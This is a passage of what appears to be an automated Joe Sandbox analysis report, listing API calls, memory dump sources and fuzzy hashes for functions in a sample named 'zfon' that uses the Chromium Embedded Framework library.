                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B90F315B
                                                                                                  • Part of subcall function 00007FF8B90F80D8: memmove.VCRUNTIME140(?,?,?,?,00000000,00007FF8B90F5912), ref: 00007FF8B90F8130
                                                                                                  • Part of subcall function 00007FF8B90F80D8: memset.VCRUNTIME140(?,?,?,?,00000000,00007FF8B90F5912), ref: 00007FF8B90F813F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturnstrcspn$localeconvmemmovememset
                                                                                                • String ID:
                                                                                                • API String ID: 2282448879-0
                                                                                                • Opcode ID: 43ba8dbb3fa5cec9301f72fa23c6b9e93b59b68c625457b30bad576e0c72c2b3
                                                                                                • Instruction ID: 9a1fa9a1c81bb4af41afdc5979876f11096732bd13441fd8c3bae6418c5a4c97
                                                                                                • Opcode Fuzzy Hash: 43ba8dbb3fa5cec9301f72fa23c6b9e93b59b68c625457b30bad576e0c72c2b3
                                                                                                • Instruction Fuzzy Hash: 86E16722B18AC6D9EF019F6DC4542EC6771AB48BD8B544232DF5D17BA9DE3CE64AC300
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2470: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24CB
                                                                                                  • Part of subcall function 00007FF7F96E2470: memcpy.VCRUNTIME140(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24E2
                                                                                                  • Part of subcall function 00007FF7F96E2470: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24FA
                                                                                                  • Part of subcall function 00007FF7F9706E90: cef_string_map_alloc.LIBCEF ref: 00007FF7F9706E99
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E717E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E718E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E719E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E71AB
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E71E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc$freemallocmemcpy
                                                                                                • String ID:
                                                                                                • API String ID: 224831930-0
                                                                                                • Opcode ID: f2e0434e812f486bbb2eabc96afd3d91da7e9aae555bade9a89ac74059c309bd
                                                                                                • Instruction ID: 440d90fa74a2a0492aa4cae09d76a251777b5bcc2227db6bdb2b251d52d61c7c
                                                                                                • Opcode Fuzzy Hash: f2e0434e812f486bbb2eabc96afd3d91da7e9aae555bade9a89ac74059c309bd
                                                                                                • Instruction Fuzzy Hash: 91917972B05B4185EB04EF69D8543ACA3B2FB84F99F858436CA2D037A8DF39D445C3A5
                                                                                                APIs
                                                                                                • memcmp.VCRUNTIME140 ref: 00007FF7F96F95AC
                                                                                                  • Part of subcall function 00007FF7F96E1FB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F96E219C), ref: 00007FF7F96E1FD5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: mallocmemcmp
                                                                                                • String ID:
                                                                                                • API String ID: 2019052184-0
                                                                                                • Opcode ID: d3f66d2b6ad97b184e21337da213452f51ca896170bba51c97c27b9d314203c3
                                                                                                • Instruction ID: a851d11471a6bb2a9a01406f478943c9a4783d4b123fcf08d4ddfc382f53b3a7
                                                                                                • Opcode Fuzzy Hash: d3f66d2b6ad97b184e21337da213452f51ca896170bba51c97c27b9d314203c3
                                                                                                • Instruction Fuzzy Hash: 0F71C651608B9281E760BE229E002A997B2BB45BC8F884035DF7D877CDEF3DE4918391
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                • Opcode ID: dbac351c522733198ef531d23818992bc4ed6bb4c5475570b617ac3196796fe6
                                                                                                • Instruction ID: 70b68bf00c0dd6963c6d54ab4f6893e9f7a1022d3e65ea67e95a3756a7287223
                                                                                                • Opcode Fuzzy Hash: dbac351c522733198ef531d23818992bc4ed6bb4c5475570b617ac3196796fe6
                                                                                                • Instruction Fuzzy Hash: C0817B72608BC18AEB25DF24E8403EEB7B0FB84748F844129EB9D07AA9DF79D545C750
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: fgetwc
                                                                                                • String ID:
                                                                                                • API String ID: 2948136663-0
                                                                                                • Opcode ID: 7b092b86c2f800b45fcf13971108f149f52e97cd8681566c45f30ae54ea6449e
                                                                                                • Instruction ID: 5c60dcfed1fb245a678fda8319a3aa91679389c283d12a4a938782ff3e20dd5e
                                                                                                • Opcode Fuzzy Hash: 7b092b86c2f800b45fcf13971108f149f52e97cd8681566c45f30ae54ea6449e
                                                                                                • Instruction Fuzzy Hash: AA813972608A81D9EF508F29C4903AC33A5FB48BD8F515232EB5E47B99EF38D685D350
                                                                                                APIs
                                                                                                • new.LIBCMT ref: 00007FF7F96E946B
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9491
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E94FF
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9532
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9560
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 2776152272-0
                                                                                                • Opcode ID: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                • Instruction ID: ea14ab52a017e56efc11d17fd89dfcb0153cfe4f5ae46667084028a3894cf2bf
                                                                                                • Opcode Fuzzy Hash: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                • Instruction Fuzzy Hash: 77618D62B04B4185FB00EFA1D8403ACA7B2AF44B98F998135DE2D17BD9CF39D845C3A4
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                  • Part of subcall function 00007FF7F96E2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                • new.LIBCMT ref: 00007FF7F96E923F
                                                                                                  • Part of subcall function 00007FF7F97A3D44: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F97A3D70
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9266
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9302
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9336
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96E9364
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturncef_string_map_alloc$malloc
                                                                                                • String ID:
                                                                                                • API String ID: 1577610649-0
                                                                                                • Opcode ID: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                • Instruction ID: 0547ccf5f14cf60f49b76936b4203f2f616f7a6fa42d73d0c3e188d159650e79
                                                                                                • Opcode Fuzzy Hash: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                • Instruction Fuzzy Hash: B251A122B05B4188EB05AFA1D8402AD77B2BF44B98F994135DE2D17BD9CF39D845C390
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 4020268379-0
                                                                                                • Opcode ID: 0a302a5f15a6ffb896fe3f1ed937148e5395896a0c9eb31bcb25d4cdad06a287
                                                                                                • Instruction ID: 1b867b08b18c25522a22012fef3fb25902b8724ce406b658cfe867004a5ed154
                                                                                                • Opcode Fuzzy Hash: 0a302a5f15a6ffb896fe3f1ed937148e5395896a0c9eb31bcb25d4cdad06a287
                                                                                                • Instruction Fuzzy Hash: 5741D062619B8185EB61AF02E84037AA7B1FB89BE0F451235EEAE077D8DF3DD0408351
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 4020268379-0
                                                                                                • Opcode ID: 12b8396c82e345bc1688e98f6ccbff207033e9e2852a0f582d1375f5ce158e35
                                                                                                • Instruction ID: fb0ad63a0a6ea2b563ed47bb1edb450ed410effdd6f00e3b673615a02c7e9b39
                                                                                                • Opcode Fuzzy Hash: 12b8396c82e345bc1688e98f6ccbff207033e9e2852a0f582d1375f5ce158e35
                                                                                                • Instruction Fuzzy Hash: C3419122719B8181EB50AF12E84436AA371BB89BE0F551235EEAE07BD9DF3DD440C394
                                                                                                APIs
                                                                                                • memcpy.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F25A5
                                                                                                • memset.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F25B3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F25EC
                                                                                                • memcpy.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F25F6
                                                                                                • memset.VCRUNTIME140(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2604
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpymemset$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 530858481-0
                                                                                                • Opcode ID: 8df3b8b3b55c4ad0e2b75d810ff762bfc816abf5dc778e1cac203e07009b2fb8
                                                                                                • Instruction ID: fe723e947157d56439f0a000ac368c34daa6e4f4561556c4584ff022581b18a0
                                                                                                • Opcode Fuzzy Hash: 8df3b8b3b55c4ad0e2b75d810ff762bfc816abf5dc778e1cac203e07009b2fb8
                                                                                                • Instruction Fuzzy Hash: 6A41AE22B09BC191EE14EF2AA5142A96355FB44FE0F584A31DF6D4B7D6DE7CE242C304
                                                                                                APIs
                                                                                                • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FF8B90FC333), ref: 00007FF8B90FC617
                                                                                                • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FF8B90FC333), ref: 00007FF8B90FC648
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FF8B90FC333), ref: 00007FF8B90FC680
                                                                                                • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FF8B90FC333), ref: 00007FF8B90FC68A
                                                                                                • memcpy.VCRUNTIME140(?,?,?,00000000,?,?,00000001,00000000,00000000,00000000,?,00007FF8B90FC333), ref: 00007FF8B90FC6BB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2665656946-0
                                                                                                • Opcode ID: c5414dc02fb282a514dd476fa31f041e2728c0031ac456c67ca1122fc35b3a76
                                                                                                • Instruction ID: 60c9f492c125ce3ca31b3fc7ed246d63194bd291fda77b7d944694c4bdf4bc1c
                                                                                                • Opcode Fuzzy Hash: c5414dc02fb282a514dd476fa31f041e2728c0031ac456c67ca1122fc35b3a76
                                                                                                • Instruction Fuzzy Hash: 8F41D062B08A9191EE04EF2AE4096AE6365FB54FD4F544132EF5D07BA9DE7CE246C300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 2665656946-0
                                                                                                • Opcode ID: 46b82a7cf3177d4084a802e0d1aaf4a65ae280c1fa6c272f9c3f0bbded35a758
                                                                                                • Instruction ID: 803599bd5aa181a20ee500ac7ce7768db680c4a878da74141004c109cab35c0a
                                                                                                • Opcode Fuzzy Hash: 46b82a7cf3177d4084a802e0d1aaf4a65ae280c1fa6c272f9c3f0bbded35a758
                                                                                                • Instruction Fuzzy Hash: DC313462708A8191DE00EF2AE9042AE7361FB48FD4F484532DF5D0BB56DE3CE152C304
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameName::$Name::operator+
                                                                                                • String ID:
                                                                                                • API String ID: 826178784-0
                                                                                                • Opcode ID: f8c65f689e74ec1d19f277c4e47f913f6a8a81dfac6f18ea7d1e3c5bf52b630d
                                                                                                • Instruction ID: be0f216689db4221ada2cde17dee223f4999b0de5784a2b921b308492e881ba4
                                                                                                • Opcode Fuzzy Hash: f8c65f689e74ec1d19f277c4e47f913f6a8a81dfac6f18ea7d1e3c5bf52b630d
                                                                                                • Instruction Fuzzy Hash: 7E417E22B19A5698FB10CBA9E8A01BCB7A8BF15BC0B984032DB4D63795DF3CF415C340
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                • Opcode ID: c7be93b47b78dac1e6dca633dd4509a2773a55bac6c05f665f9044a2a3758c04
                                                                                                • Instruction ID: f6013f110e6b3832d8a9f1ffa5df238f0fba5f31030a14bb7dcd8d2f17a2985d
                                                                                                • Opcode Fuzzy Hash: c7be93b47b78dac1e6dca633dd4509a2773a55bac6c05f665f9044a2a3758c04
                                                                                                • Instruction Fuzzy Hash: 50417F72618B8582EB609F15E8507A9B7B0FB88BD5F845032DB8E47A58DF3CD485CB60
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3856544966-0
                                                                                                • Opcode ID: 8e17ec145e53769a2c641425164b26e1b6e40d98fb995a57eac84be446339539
                                                                                                • Instruction ID: f96666cc8f02640de51253928d317ae7bbfb07f34204bf7c11bb12423b19d67f
                                                                                                • Opcode Fuzzy Hash: 8e17ec145e53769a2c641425164b26e1b6e40d98fb995a57eac84be446339539
                                                                                                • Instruction Fuzzy Hash: 53318F32A08B4691EB14EF65E848369B371FB88790F810135D6AD07AE9CF7DD481C7A5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                • Opcode ID: 225472a601b65b387531f845988a81aac3dd013bdd7c23c631c239d08109b78f
                                                                                                • Instruction ID: 7d0ad30a399ccb4988979eb455d1bf60ba36eb455b54b7d97739cadb83a1b462
                                                                                                • Opcode Fuzzy Hash: 225472a601b65b387531f845988a81aac3dd013bdd7c23c631c239d08109b78f
                                                                                                • Instruction Fuzzy Hash: 20317E72618A82C2EF64DF11E8503A9A370FB98BD5F849031DA4E466A8DF3CD485C760
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                APIs
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
